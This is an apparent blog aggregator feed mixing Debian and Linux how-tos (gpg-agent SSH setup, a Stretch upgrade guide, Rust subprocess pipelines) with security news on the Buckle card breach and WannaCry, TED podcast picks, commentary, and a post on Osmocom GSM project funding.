jas@latte:~$ ssh-add -L
The agent has no identities.
jas@latte:~$ 

Tracking this down, I now realize that GNOME’s keyring is used for SSH but GnuPG’s gpg-agent is used for GnuPG. GnuPG uses the environment variable GPG_AGENT_INFO to connect to an agent, and SSH uses the SSH_AUTH_SOCK environment variable to find its agent. The filenames used below leak the knowledge that gpg-agent is used for GnuPG but GNOME keyring is used for SSH.

jas@latte:~$ echo $GPG_AGENT_INFO 
/run/user/1000/gnupg/S.gpg-agent:0:1
jas@latte:~$ echo $SSH_AUTH_SOCK 
/run/user/1000/keyring/ssh
jas@latte:~$ 

Here the same recipe as in my previous blog post works. This time GNOME keyring only has to be disabled for SSH. Disabling GNOME keyring is not sufficient, you also need gpg-agent to start with enable-ssh-support. The simplest way to achieve that is to add a line in ~/.gnupg/gpg-agent.conf as follows. When you login, the script /etc/X11/Xsession.d/90gpg-agent will set the environment variables GPG_AGENT_INFO and SSH_AUTH_SOCK. The latter variable is only set if enable-ssh-support is mentioned in the gpg-agent configuration.

jas@latte:~$ mkdir ~/.config/autostart
jas@latte:~$ cp /etc/xdg/autostart/gnome-keyring-ssh.desktop ~/.config/autostart/
jas@latte:~$ echo 'Hidden=true' >> ~/.config/autostart/gnome-keyring-ssh.desktop 
jas@latte:~$ echo enable-ssh-support >> ~/.gnupg/gpg-agent.conf 
jas@latte:~$ 

Log out from GNOME and log in again. Now you should see ssh-add -L working.

jas@latte:~$ ssh-add -L
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFP+UOTZJ+OXydpmbKmdGOVoJJz8se7lMs139T+TNLryk3EEWF+GqbB4VgzxzrGjwAMSjeQkAMb7Sbn+VpbJf1JDPFBHoYJQmg6CX4kFRaGZT6DHbYjgia59WkdkEYTtB7KPkbFWleo/RZT2u3f8eTedrP7dhSX0azN0lDuu/wBrwedzSV+AiPr10rQaCTp1V8sKbhz5ryOXHQW0Gcps6JraRzMW+ooKFX3lPq0pZa7qL9F6sE4sDFvtOdbRJoZS1b88aZrENGx8KSrcMzARq9UBn1plsEG4/3BRv/BgHHaF+d97by52R0VVyIXpLlkdp1Uk4D9cQptgaH4UAyI1vr cardno:000601740323
jas@latte:~$ 

Topics for further discussion or research include 1) whether scdaemon, dirmngr and/or pcscd should be pre-installed on Debian desktop systems; 2) whether gpg --card-status should attempt to import the public key and secret key stub automatically; 3) why GNOME keyring is used by default for SSH rather than gpg-agent; 4) whether GNOME keyring should support smartcards, or if it is better to always use gpg-agent for GnuPG/SSH, 5) if something could/should be done to automatically infer the trust setting for a secret key.

Enjoy!

Planet DebianAlexander Wirt: alioth needs your help

It may look that the decision for pagure as alioth replacement is already finalized, but that’s not really true. I got a lot of feedback and tips in the last weeks, those made postpone my decision. Several alternative systems were recommended to me, here are a few examples:

and probably several others. I won’t be able to evaluate all of those systems in advance of our sprint. That’s where you come in: if you are familiar with one of those systems, or want to get familiar with them, join us on our mailing list and create a wiki page below https://wiki.debian.org/Alioth/GitNext with a review of your system.

What do we need to know?

  • Feature set compared to current alioth
  • Feature set compared to a popular system like github
  • Some implementation designs
  • Some information about scaling (expect something like 15.000 > 25.000 repos)
  • Support for other version control systems
  • Advantages: why should we choose that system
  • Disadvantages: why shouldn’t we choose that system
  • License
  • Other interesting features
  • Details about extensibility
  • A really nice thing would be a working vagrant box / vagrantfile + ansible/puppet to test things

If you want to start on such a review, please announce it on the mailinglist.

If you have questions, ask me on IRC, Twitter or mail. Thanks for your help!

Rondam RamblingsTrumpcare and the TPP: Republicans have learned nothing from history

As long as I'm ranting about Republican hypocrisy, I feel I should say a word about the secretive and thoroughly undemocratic process being employed by them to pass the Trumpcare bill.  If history is any guide, this will come back to bite them badly.  But Republicans don't seem to learn from history.  (Neither do Democrats, actually, but they aren't the ones trying to take my health insurance

Planet DebianEriberto Mota: Como migrar do Debian Jessie para o Stretch

Bem vindo ao Debian Stretch!

Ontem, 17 de junho de 2017, o Debian 9 (Stretch) foi lançado. Eu gostaria de falar sobre alguns procedimentos básicos e regras para migrar do Debian 8 (Jessie).

Passos iniciais

  • A primeira coisa a fazer é ler a nota de lançamento. Isso é fundamental para saber sobre possíveis bugs e situações especiais.
  • O segundo passo é atualizar o Jessie totalmente antes de migrar para o Stretch. Para isso, ainda dentro do Debian 8, execute os seguintes comandos:
# apt-get update
# apt-get dist-upgrade

Migrando

  • Edite o arquivo /etc/apt/sources.list e altere todos os nomes jessie para stretch. A seguir, um exemplo do conteúdo desse arquivo (poderá variar, de acordo com as suas necessidades):
deb http://ftp.br.debian.org/debian/ stretch main
deb-src http://ftp.br.debian.org/debian/ stretch main
                                                                                                                                
deb http://security.debian.org/ stretch/updates main
deb-src http://security.debian.org/ stretch/updates main
  • Depois, execute:
# apt-get update
# apt-get dist-upgrade

Caso haja algum problema, leia as mensagens de erro e tente resolver o problema. Resolvendo ou não tal problema, execute novamente o comando:

# apt-get dist-upgrade

Havendo novos problemas, tente resolver. Busque soluções no Google, se for necessário. Mas, geralmente, tudo dará certo e você não deverá ter problemas.

Alterações em arquivos de configuração

Quando você estiver migrando, algumas mensagens sobre alterações em arquivos de configuração poderão ser mostradas. Isso poderá deixar alguns usuários pedidos, sem saber o que fazer. Não entre em pânico.

Existem duas formas de apresentar essas mensagens: via texto puro em shell ou via janela azul de mensagens. O texto a seguir é um exemplo de mensagem em shell:

Ficheiro de configuração '/etc/rsyslog.conf'
 ==> Modificado (por si ou por um script) desde a instalação.
 ==> O distribuidor do pacote lançou uma versão atualizada.
 O que deseja fazer? As suas opções são:
 Y ou I : instalar a versão do pacote do maintainer
 N ou O : manter a versão actualmente instalada
 D : mostrar diferenças entre as versões
 Z : iniciar uma shell para examinar a situação
 A ação padrão é manter sua versão atual.
*** rsyslog.conf (Y/I/N/O/D/Z) [padrão=N] ?

A tela a seguir é um exemplo de mensagem via janela:

Nos dois casos, é recomendável que você escolha por instalar a nova versão do arquivo de configuração. Isso porque o novo arquivo de configuração estará totalmente adaptado aos novos serviços instalados e poderá ter muitas opções novas ou diferentes. Mas não se preocupe, pois as suas configurações não serão perdidas. Haverá um backup das mesmas. Assim, para shell, escolha a opção "Y" e, no caso de janela, escolha a opção "instalar a versão do mantenedor do pacote". É muito importante anotar o nome de cada arquivo modificado. No caso da janela anterior, trata-se do arquivo /etc/samba/smb.conf. No caso do shell o arquivo foi o /etc/rsyslog.conf.

Depois de completar a migração, você poderá ver o novo arquivo de configuração e o original. Caso o novo arquivo tenha sido instalado após uma escolha via shell, o arquivo original (o que você tinha anteriormente) terá o mesmo nome com a extensão .dpkg-old. No caso de escolha via janela, o arquivo será mantido com a extensão .ucf-old. Nos dois casos, você poderá ver as modificações feitas e reconfigurar o seu novo arquivo de acordo com as necessidades.

Caso você precise de ajuda para ver as diferenças entre os arquivos, você poderá usar o comando diff para compará-los. Faça o diff sempre do arquivo novo para o original. É como se você quisesse ver como fazer com o novo arquivo para ficar igual ao original. Exemplo:

# diff -Naur /etc/rsyslog.conf /etc/rsyslog.conf.dpkg-old

Em uma primeira vista, as linhas marcadas com "+" deverão ser adicionadas ao novo arquivo para que se pareça com o anterior, assim como as marcadas com "-" deverão ser suprimidas. Mas cuidado: é normal que haja algumas linhas diferentes, pois o arquivo de configuração foi feito para uma nova versão do serviço ou aplicativo ao qual ele pertence. Assim, altere somente as linhas que realmente são necessárias e que você mudou no arquivo anterior. Veja o exemplo:

+daemon.*;mail.*;\
+ news.err;\
+ *.=debug;*.=info;\
+ *.=notice;*.=warn |/dev/xconsole
+*.* @sam

No meu caso, originalmente, eu só alterei a última linha. Então, no novo arquivo de configuração, só terei interesse em adicionar essa linha. Bem, se foi você quem fez a configuração anterior, você saberá fazer a coisa certa. Geralmente, não haverá muitas diferenças entre os arquivos.

Outra opção para ver as diferenças entre arquivos é o comando mcdiff, que poderá ser fornecido pelo pacote mc. Exemplo:

# mcdiff /etc/rsyslog.conf /etc/rsyslog.conf.dpkg-old

Problemas com ambientes e aplicações gráficas

É possível que você tenha algum problema com o funcionamento de ambientes gráficos, como Gnome, KDE etc, ou com aplicações como o Mozilla Firefox. Nesses casos, é provável que o problema seja os arquivos de configuração desses elementos, existentes no diretório home do usuário. Para verificar, crie um novo usuário no Debian e teste com ele. Se tudo der certo, faça um backup das configurações anteriores (ou renomeie as mesmas) e deixe que a aplicação crie uma configuração nova. Por exemplo, para o Mozilla Firefox, vá ao diretório home do usuário e, com o Firefox fechado, renomeie o diretório .mozilla para .mozilla.bak, inicie o Firefox e teste.

Está inseguro?

Caso você esteja muito inseguro, instale um Debian 8, com ambiente gráfico e outras coisas, em uma máquina virtual e migre para Debian 9 para testar e aprender. Sugiro VirtualBox como virtualizador.

Divirta-se!

 

Rondam RamblingsAnd the Oscar for Most Extreme Hypocrisy by a Republican goes to...

New Gingrich!  For saying that "the president “technically” can’t even obstruct justice" after leading the charge to impeach Bill Clinton for obstructing justice.  Congratulations, Mr. Gingrich!  Being the most hypocritical Republican is quite an achievement in this day and age.

Planet DebianMichal Čihař: python-gammu for Windows

It has been few months since I'm providing Windows binaries for Gammu, but other parts of the family were still missing. Today, I'm adding python-gammu.

Unlike previous attempts which used crosscompilation on Linux using Wine, this is also based on AppVeyor. Still I don't have to touch Windows to do that, what is nice :-). This has been introducted in python-gammu 2.9 and depend on Gammu 1.38.4.

What is good on this is that pip install python-gammu should now work with binary packages if you're using Python 3.5 or 3.6.

Maybe I'll find time to look at option providing Wammu as well, but it's more tricky there as it doesn't support Python 3, while the python-gammu for Windows can currently only be built for Python 3.5 and 3.6 (due to MSVC dependencies of older Python versions).

Filed under: Debian English Gammu python-gammu Wammu

Planet DebianVasudev Kamath: Rust - Shell like Process pipelines using subprocess crate

I had to extract copyright information from the git repository of the crate upstream. The need aroused as part of updating debcargo, tool to create Debian package source from the Rust crate.

General idea behind taking copyright information from git is to extract starting and latest contribution year for every author/committer. This can be easily achieved using following shell snippet

for author in $(git log --format="%an" | sort -u); do
   author_email=$(git log --format="%an <%ae>" --author="$author" | head -n1)
   first=$(git \
   log --author="$author" --date=format:%Y --format="%ad" --reverse \
             | head -n1)
   latest=$(git log --author="$author" --date=format:%Y --format="%ad" \
             | head -n1)
   if [ $first -eq $latest ]; then
       echo "$first, $author_email"
   else
       echo "$first-$latest, $author_email"
   fi
done

Now challenge was to execute these command in Rust and get the required answer. So first step was I looked at std::process, default standard library support for executing shell commands.

My idea was to execute first command to extract authors into a Rust vectors or array and then have 2 remaining command to extract years in a loop. (Yes I do not need additional author_email command in Rust as I can easily get both in the first command which is used in for loop of shell snippet and use it inside another loop). So I setup to 3 commands outside the loop with input and output redirected, following is snippet should give you some idea of what I tried to do.

let authors_command = Command::new("/usr/bin/git")
             .arg("log")
             .arg("--format=\"%an <%ae>\"")
             .spawn()?;
let output = authors_command.wait()?;
let authors: Vec<String> = String::from_utf8(output.stdout).split('\n').collect();
let head_n1 = Command::new("/usr/bin/head")
             .arg("-n1")
             .stdin(Stdio::piped())
             .stdout(Stdio::piped())
             .spwn()?;
for author in &authors {
             ...
}

And inside the loop I would create additional 2 git commands read their output via pipe and feed it to head command. This is where I learned that it is not straight forward as it looks :-). std::process::Command type does not implement Copy nor Clone traits which means one use of it I will give up the ownership!. And here I started fighting with borrow checker. I need to duplicate declarations to make sure I've required commands available all the time. Additionally I needed to handle error output at every point which created too many nested statements there by complicating the program and reducing its readability

When all started getting out of control I gave a second thought and wondered if it would be good to write down this in shell script ship it along with debcargo and use the script Rust program. This would satisfy my need but I would need to ship additional script along with debcargo which I was not really happy with.

Then a search on crates.io revealed subprocess, a crate designed to be similar with subprocess module from Python!. Though crate is not highly downloaded it still looked promising, especially the trait implements a trait called BitOr which allows use of | operator to chain the commands. Additionally it allows executing full shell commands without need of additional chaining of argument which was done above snippet. End result a much simplified easy to read and correct function which does what was needed. Below is the function I wrote to extract copyright information from git repo.

fn copyright_fromgit(repo: &str) -> Result<Vec<String>> {
    let tempdir = TempDir::new_in(".", "debcargo")?;
    Exec::shell(OsStr::new(format!("git clone --bare {} {}",
                                repo,
                                tempdir.path().to_str().unwrap())
                              .as_str())).stdout(subprocess::NullFile)
                              .stderr(subprocess::NullFile)
                              .popen()?;

    let author_process = {
         Exec::shell(OsStr::new("git log --format=\"%an <%ae>\"")).cwd(tempdir.path()) |
         Exec::shell(OsStr::new("sort -u"))
     }.capture()?;
    let authors = author_process.stdout_str().trim().to_string();
    let authors: Vec<&str> = authors.split('\n').collect();
    let mut notices: Vec<String> = Vec::new();
    for author in &authors {
        let reverse_command = format!("git log --author=\"{}\" --format=%ad --date=format:%Y \
                                    --reverse",
                                   author);
        let command = format!("git log --author=\"{}\" --format=%ad --date=format:%Y",
                           author);
        let first = {
             Exec::shell(OsStr::new(&reverse_command)).cwd(tempdir.path()) |
             Exec::shell(OsStr::new("head -n1"))
         }.capture()?;

         let latest = {
             Exec::shell(OsStr::new(&command)).cwd(tempdir.path()) | Exec::shell("head -n1")
         }.capture()?;

        let start = i32::from_str(first.stdout_str().trim())?;
        let end = i32::from_str(latest.stdout_str().trim())?;
        let cnotice = match start.cmp(&end) {
            Ordering::Equal => format!("{}, {}", start, author),
            _ => format!("{}-{}, {}", start, end, author),
        };

        notices.push(cnotice);
    }

    Ok(notices)
}

Of course it is not as short as the shell or probably Python code, but that is fine as Rust is system level programming language (which is intended to replace C/C++) and doing complex Shell code (complex due to need of shell pipelines) in approximately 50 lines of code in safe and secure way is very much acceptable. Besides code is as much readable as a plain shell snippet thanks to the | operator implemented by subprocess crate.

Debian Administration Debian Stretch Released

Today the Debian project is pleased to announce the release of the next stable release of Debian GNU/Linux, code-named Stretch.

,

Krebs on SecurityCredit Card Breach at Buckle Stores

The Buckle Inc., a clothier that operates more than 450 stores in 44 U.S. states, disclosed Friday that its retail locations were hit by malicious software designed to steal customer credit card data. The disclosure came hours after KrebsOnSecurity contacted the company regarding reports from sources in the financial sector about a possible breach at the retailer.

buckle

On Friday morning, KrebsOnSecurity contacted The Buckle after receiving multiple tips from sources in the financial industry about a pattern of fraud on customer credit and debit cards which suggested a breach of point-of-sale systems at Buckle stores across the country.

Later Friday evening, The Buckle Inc. released a statement saying that point-of-sale malware was indeed found installed on cash registers at Buckle retail stores, and that the company believes the malware was stealing customer credit card data between Oct. 28, 2016 and April 14, 2017. The Buckle said purchases made on its online store were not affected.

As with the recent POS-malware based breach at Kmart, The Buckle said all of its stores are equipped with EMV-capable card terminals, meaning the point-of-sale machines can accommodate newer, more secure chip-based credit and debit cards. The malware copies account data stored on the card’s magnetic stripe. Armed with that information, thieves can clone the cards and use them to buy high-priced merchandise from electronics stores and big box retailers.

The trouble is that not all banks have issued chip-enabled cards, which are far more expensive and difficult for thieves to counterfeit. Customers who shopped at compromised Buckle stores using a chip-based card would not be in danger of having their cards cloned and used elsewhere, but the stolen card data could still be used for e-commerce fraud.

Visa said in March 2017 there were more than 421 million Visa chip cards in the country, representing 58 percent of Visa cards. According to Visa, counterfeit fraud has been declining month over month — down 58 percent at chip-enabled merchants in December 2016 when compared to the previous year.

The United States is the last of the G20 nations to make the shift to chip-based cards. Visa has said it typically took about three years after the liability shifts in other countries before 90% of payment card transactions were “chip-on-chip,” or generated by a chip card used at a chip-based terminal.

Virtually every other country that has made the jump to chip-based cards saw fraud trends shifting from card-present to card-not-present (online, phone) fraud as it became more difficult for thieves to counterfeit physical credit cards. Data collected by consumer credit bureau Experian suggests that e-commerce fraud increased 33 percent last year over 2015.

TED5 TED Radio Hour episodes that explore what it’s like to be human

TED Radio Hour started in 2013, and while I’ve only been working on the show for about a year, it’s one of my favorite parts of my job. We work with an incredibly creative team over at NPR, and helping them weave different ideas into a narrative each week adds a whole new dimension to the talks.

On Friday, the podcast published its 100th episode. The theme is A Better You, and in the hour we explore the many ways we as humans try to improve ourselves. We look at the role of our own minds when it comes to self-improvement, and the tension in play between the internal and the external in this struggle.

New to the show, or looking to dip back into the archive? Below are five of my favorite episodes so far that explore what it means to be human.

The Hero’s Journey

What makes a hero? Why are we so drawn to stories of lone figures, battling against the odds? We talk about space and galaxies far, far away a lot at TED, but in this episode we went one step further and explored the concept of the Hero’s Journey relates to the Star Wars universe – and the ideas of TED speakers. Dame Ellen MacArthur shares the transformative impact of her solo sailing trip around the world. Jarrett J. Krosoczka pays homage to the surprising figures that formed his path in life. George Takei tells his powerful story of being held in a Japanese-American internment camp during WWII, and how he managed to forgive, and even love, the country that treated him this way. We finish up the hour with Ismael Nazario’s story of spending 300 days in solitary confinement before he was even convicted of a crime, and how this ultimately set him on a journey to help others.

Anthropocene

In this episode, four speakers make the case that we are now living in a new geological age called the Anthropocene, where the main force impacting the earth – is us. Kenneth Lacovara opens the show by taking us on a tour of the earth’s ages so far. Next Emma Marris calls us to connect with nature in a new way so we’ll actually want to protect it. Then, Peter Ward looks at what past extinctions can tell us about the earth – and ourselves. Finally Cary Fowler takes us deep within a vault in Svalbard, where a group of scientists are storing seeds in an attempt to ultimately preserve our species. While the subject could easily be a ‘doom and gloom’ look at the state of our planet, ultimately it left me hopeful and optimistic for our ability to solve some of these monumental problems. If you haven’t yet heard of the Anthropocene, I promise that after this episode you’ll start coming across it everywhere.

The Power of Design

Doing an episode on design seemed like an obvious choice, and we were excited about the challenge of creating an episode about such a visual discipline for radio. We looked at the ways good or bad design affects us, and the ways we can make things more elegant and beautiful. Tony Fadell starts out the episode by bringing us back to basics, calling out the importance of noticing design flaws in the world around us in order to solve problems. Marc Kushner predicts how architectural design is going to be increasingly shaped by public perception and social media. Airbnb co-founder Joe Gebbia takes us inside the design process that helped people establish enough trust to open up their homes to complete strangers. Next we take an insightful design history lesson with Alice Rawsthorn to pay homage to bold and innovative design thinkers of the past, and their impact on the present. We often think of humans as having a monopoly on design, but our final speaker in this episode, Janine Benyus, examines the incredible design lessons we can take from the natural world.

Beyond Tolerance

We throw around the word ‘tolerance’ a lot – especially in the last year as politics has grown even more polarized. But how can we push past mere tolerance to true understanding and empathy? I remember when we first started talking about this episode Guy said he wanted it to be a deep dive into things you wouldn’t talk about at the dinner table, and we did just that: from race, to politics, to abortion, all the way to Israeli-Palestinian relations. Arthur Brooks tackles the question of how liberals and conservatives can work together – and why it’s so crucial. Diversity advocate Vernā Myers gives some powerful advice on how to conquer our unconscious biases. In the fraught and often painful debate around abortion, Aspen Baker emphasizes the need to listen: to be pro-voice, rather than pro-life or pro-choice. Finally Aziz Abu Sarah describes the tours he leads which bring Jews, Muslims and Christians across borders to break bread and forge new cultural ties.

Headspace

What I really love about this episode is that it takes a dense and difficult subject – mental health – and approaches it with this very human optimism, ultimately celebrating the resilience and power of our minds. The show opens up with Andrew Solomon, one of my favorite TED speakers, who shares what he has learned from his battle with depression, including how he forged meaning and identity from his experience with the illness. He has some fascinating and beautiful ideas around mental health and personality, which still resonate so strongly with me. Next, Alix Generous explains some of the misconceptions around Asperger’s Syndrome; she beautifully articulates the gap between her “complex inner life” and how she communicates with the world. David Anderson looks at the biology of emotion and how our brains function, painting a picture of how new research could revolutionize the way we understand and care for our mental health. Our fourth speaker, psychologist Guy Winch, gives some strong takeaways on how we can incorporate caring for our ‘emotional health’ in our daily lives.

Happy listening! To find out more about the show, follow us on Facebook and Twitter.


,

CryptogramFriday Squid Blogging: Squids from Space Video Game

An early preview.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

CryptogramNSA Links WannaCry to North Korea

There's evidence:

Though the assessment is not conclusive, the preponderance of the evidence points to Pyongyang. It includes the range of computer Internet protocol addresses in China historically used by the RGB, and the assessment is consistent with intelligence gathered recently by other Western spy agencies. It states that the hackers behind WannaCry are also called "the Lazarus Group," a name used by private-sector researchers.

One of the agencies reported that a prototype of WannaCry ransomware was found this spring in a non-Western bank. That data point was a "building block" for the North Korea assessment, the individual said.

Honestly, I don't know what to think. I am skeptical, but I am willing to be convinced. (Here's the grugq, also trying to figure it out.) What I would like to see is the NSA evidence in more detail than they're probably comfortable releasing.

More commentary. Slashdot thread.

Sociological ImagesLonely Hearts: Estranged Fathers on Father’s Day

I work with one of the most heartbroken groups of people in the world: fathers whose adult children want nothing to do with them. While every day has its challenges, Father’s Day—with its parade of families and feel-good ads—makes it especially difficult for these Dads to avoid the feelings of shame, guilt and regret always lurking just beyond the reach of that well-practiced compartmentalization. Like birthdays, and other holidays, Father’s Day creates the wish, hope, or prayer that maybe today, please today, let me hear something, anything from my kid.

Many of these men are not only fathers but grandfathers who were once an intimate part of their grandchildren’s lives. Or, more tragically, they discovered they were grandfathers through a Facebook page, if they hadn’t yet been blocked. Or, they learn from an unwitting relative bearing excited congratulations, now surprised by the look of grief and shock that greets the newly announced grandfather. Hmm, what did I do with those cigars I put aside for this occasion?

And it’s not just being involved as a grandfather that gets denied. The estrangement may foreclose the opportunity to celebrate other developmental milestones he always assumed he’d attend, such as college graduations, engagement parties, or weddings. Maybe he was invited to the wedding but told he wouldn’t get to walk his daughter down the aisle because that privilege was being reserved for her father-in-law whom she’s decided is a much better father than he ever was.

Most people assume that a Dad would have to do something pretty terrible to make an adult child not want to have contact. My clinical experience working with estranged parents doesn’t bear this out. While those cases clearly exist, many parents get cut out as a result of the child needing to feel more independent and less enmeshed with the parent or parents. A not insignificant number of estrangements are influenced by a troubled or compelling son-in-law or daughter-in-law. Sometimes a parent’s divorce creates the opportunity for one parent to negatively influence the child against the other parent, or introduce people who compete for the parent’s love, attention or resources. In a highly individualistic culture such as ours, divorce may cause the child to view a parent more as an individual with relative strengths and weaknesses rather than a family unit of which they’re a part.

Little binds adult children to their parents today beyond whether or not the adult child wants that relationship. And a not insignificant number decide that they don’t.

While my clinical work hasn’t shown fathers to be more vulnerable to estrangement than mothers, they do seem to be more at risk of a lower level of investment from their adult children. A recent Pew survey found that women more commonly say their grown children turn to them for emotional support while men more commonly say this “hardly ever” or “never” occurs. This same study reported that half of adults say they are closer with their mothers, while only 15 percent say they are closer with their fathers.

So, yes, let’s take a moment to celebrate fathers everywhere. And another to feel empathy for those Dads who won’t have any contact with their child on Father’s Day.

Or any other day.

Josh Coleman is Co-Chair, Council on Contemporary Families, and author most recently of When Parents Hurt. Originally posted at Families as They Really Are.

(View original at https://thesocietypages.org/socimages)

CryptogramGaming Google News

Turns out that it's surprisingly easy to game:

It appears that news sites deemed legitimate by Google News are being modified by third parties. These sites are then exploited to redirect to the spam content. It appears that the compromised sites are examining the referrer and redirecting visitors coming from Google News.

Worse Than FailureError'd: @TitleOfErrord

"I asked my son, @Firstname, and he is indeed rather @Emotion about going to @ThemePark!" wrote Chris @LASTNAME.

 

"I think Google assumes there is only one exit on the highway," writes Balaprasanna S.

 

Axel C. writes, "So what you're saying here is that something went wrong?"

 

"Hmmmm...YMMV, but that's not quite the company that I would want to follow," wrote Rob H.

 

"You know, I also confuse San Francisco with San Jose all the time. I mean, they just sound so much alike!" writes Mike S.

 

Mike G. writes, "Sure, it's a little avant garde, but I hear this film was nominated for an award."

 

[Advertisement] Otter enables DevOps best practices by providing a visual, dynamic, and intuitive UI that shows, at-a-glance, the configuration state of all your servers. Find out more and download today!

,

Harald WelteHow the Osmocom GSM stack is funded

As the topic has been raised on twitter, I thought I might share a bit of insight into the funding of the Osmocom Cellular Infrastructure Projects.

Keep in mind: Osmocom is a much larger umbrella project, and beyond the Networks-side cellular stack is home many different community-based projects around open source mobile communications. All of those have started more or less as just for fun projects, nothing serious, just a hobby [1]

The projects implementing the network-side protocol stacks and network elements of GSM/GPRS/EGPRS/UMTS cellular networks are somewhat the exception to that, as they have evolved to some extent professionalized. We call those projects collectively the Cellular Infrastructure projects inside Osmocom. This post is about that part of Osmocom only

History

From late 2008 through 2009, People like Holger and I were working on bs11-abis and later OpenBSC only in our spare time. The name Osmocom didn't even exist back then. There was a strong technical community with contributions from Sylvain Munaut, Andreas Eversberg, Daniel Willmann, Jan Luebbe and a few others. None of this would have been possible if it wasn't for all the help we got from Dieter Spaar with the BS-11 [2]. We all had our dayjob in other places, and OpenBSC work was really just a hobby. People were working on it, because it was where no FOSS hacker has gone before. It was cool. It was a big and pleasant challenge to enter the closed telecom space as pure autodidacts.

Holger and I were doing freelance contract development work on Open Source projects for many years before. I was mostly doing Linux related contracting, while Holger has been active in all kinds of areas throughout the FOSS software stack.

In 2010, Holger and I saw some first interest by companies into OpenBSC, including Netzing AG and On-Waves ehf. So we were able to spend at least some of our paid time on OpenBSC/Osmocom related contract work, and were thus able to do less other work. We also continued to spend tons of spare time in bringing Osmocom forward. Also, the amount of contract work we did was only a fraction of the many more hours of spare time.

In 2011, Holger and I decided to start the company sysmocom in order to generate more funding for the Osmocom GSM projects by means of financing software development by product sales. So rather than doing freelance work for companies who bought their BTS hardware from other places (and spent huge amounts of cash on that), we decided that we wanted to be a full solution supplier, who can offer a complete product based on all hardware and software required to run small GSM networks.

The only problem is: We still needed an actual BTS for that. Through some reverse engineering of existing products we figured out who one of the ODM suppliers for the hardware + PHY layer was, and decided to develop the OsmoBTS software to do so. We inherited some of the early code from work done by Andreas Eversberg on the jolly/bts branch of OsmocomBB (thanks), but much was missing at the time.

What follows was Holger and me working several years for free [3], without any salary, in order to complete the OsmoBTS software, build an embedded Linux distribution around it based on OE/poky, write documentation, etc. and complete the first sysmocom product: The sysmoBTS 1002

We did that not because we want to get rich, or because we want to run a business. We did it simply because we saw an opportunity to generate funding for the Osmocom projects and make them more sustainable and successful. And because we believe there is a big, gaping, huge vacuum in terms of absence of FOSS in the cellular telecom sphere.

Funding by means of sysmocom product sales

Once we started to sell the sysmoBTS products, we were able to fund Osmocom related development from the profits made on hardware / full-system product sales. Every single unit sold made a big contribution towards funding both the maintenance as well as the ongoing development on new features.

This source of funding continues to be an important factor today.

Funding by means of R&D contracts

The probably best and most welcome method of funding Osmocom related work is by means of R&D projects in which a customer funds our work to extend the Osmocom GSM stack in one particular area where he has a particular need that the existing code cannot fulfill yet.

This kind of project is the ideal match, as it shows where the true strength of FOSS is: Each of those customers did not have to fund the development of a GSM stack from scratch. Rather, they only had to fund those bits that were missing for their particular application.

Our reference for this is and has been On-Waves, who have been funding development of their required features (and bug fixing etc.) since 2010.

We've of course had many other projects from a variety of customers over over the years. Last, but not least, we had a customer who willingly co-funded (together with funds from NLnet foundation and lots of unpaid effort by sysmocom) the 3G/3.5G support in the Osmocom stack.

The problem here is:

  • we have not been able to secure anywhere nearly as many of those R&D projects within the cellular industry, despite believing we have a very good foundation upon which we can built. I've been writing many exciting technical project proposals
  • you almost exclusively get funding only for new features. But it's very hard to get funding for the core maintenance work. The bug-fixing, code review, code refactoring, testing, etc.

So as a result, the profit margin you have on selling R&D projects is basically used to (do a bad job of) fund those bits and pieces that nobody wants to pay for.

Funding by means of customer support

There is a way to generate funding for development by providing support services. We've had some success with this, but primarily alongside the actual hardware/system sales - not so much in terms of pure software-only support.

Also, providing support services from a R&D company means:

  • either you distract your developers by handling support inquiries. This means they will have less time to work on actual code, and likely get side tracked by too many issues that make it hard to focus
  • or you have to hire separate support staff. This of course means that the size of the support business has to be sufficiently large to not only cover the cots of hiring + training support staff, but also still generate funding for the actual software R&D.

We've tried shortly with the second option, but fallen back to the first for now. There's simply not sufficient user/admin type support business to rectify dedicated staff for that.

Funding by means of cross-subsizing from other business areas

sysmocom also started to do some non-Osmocom projects in order to generate revenue that we can feed again into Osmocom projects. I'm not at liberty to discuss them in detail, but basically we've been doing pretty much anything from

  • custom embedded Linux board designs
  • M2M devices with GSM modems
  • consulting gigs
  • public tendered research projects

Profits from all those areas went again into Osmocom development.

Last, but not least, we also operate the sysmocom webshop. The profit we make on those products also is again immediately re-invested into Osmocom development.

Funding by grants

We've had some success in securing funding from NLnet Foundation for specific features. While this is useful, the size of their projects grants of up to EUR 30k is not a good fit for the scale of the tasks we have at hand inside Osmocom. You may think that's a considerable amount of money? Well, that translates to 2-3 man-months of work at a bare cost-covering rate. At a team size of 6 developers, you would theoretically have churned through that in two weeks. Also, their focus is (understandably) on Internet and IT security, and not so much cellular communications.

There are of course other options for grants, such as government research grants and the like. However, they require long-term planning, they require you to match (i.e. pay yourself) a significant portion, and basically mandate that you hire one extra person for doing all the required paperwork and reporting. So all in all, not a particularly attractive option for a very small company consisting of die hard engineers.

Funding by more BTS ports

At sysmocom, we've been doing some ports of the OsmoBTS + OsmoPCU software to other hardware, and supporting those other BTS vendors with porting, R&D and support services.

If sysmocom was a classic BTS vendor, we would not help our "competition". However, we are not. sysmocom exists to help Osmocom, and we strongly believe in open systems and architectures, without a single point of failure, a single supplier for any component or any type of vendor lock-in.

So we happily help third parties to get Osmocom running on their hardware, either with a proprietary PHY or with OsmoTRX.

However, we expect that those BTS vendors also understand their responsibility to share the development and maintenance effort of the stack. Preferably by dedicating some of their own staff to work in the Osmocom community. Alternatively, sysmocom can perform that work as paid service. But that's a double-edged sword: We don't want to be a single point of failure.

Osmocom funding outside of sysmocom

Osmocom is of course more than sysmocom. Even for the cellular infrastructure projects inside Osmocom is true: They are true, community-based, open, collaborative development projects. Anyone can contribute.

Over the years, there have been code contributions by e.g. Fairwaves. They, too, build GSM base station hardware and use that as a means to not only recover the R&D on the hardware, but also to contribute to Osmocom. At some point a few years ago, there was a lot of work from them in the area of OsmoTRX, OsmoBTS and OsmoPCU. Unfortunately, in more recent years, they have not been able to keep up the level of contributions.

There are other companies engaged in activities with and around Osmcoom. There's Rhizomatica, an NGO helping indigenous communities to run their own cellular networks. They have been funding some of our efforts, but being an NGO helping rural regions in developing countries, they of course also don't have the deep pockets. Ideally, we'd want to be the ones contributing to them, not the other way around.

State of funding

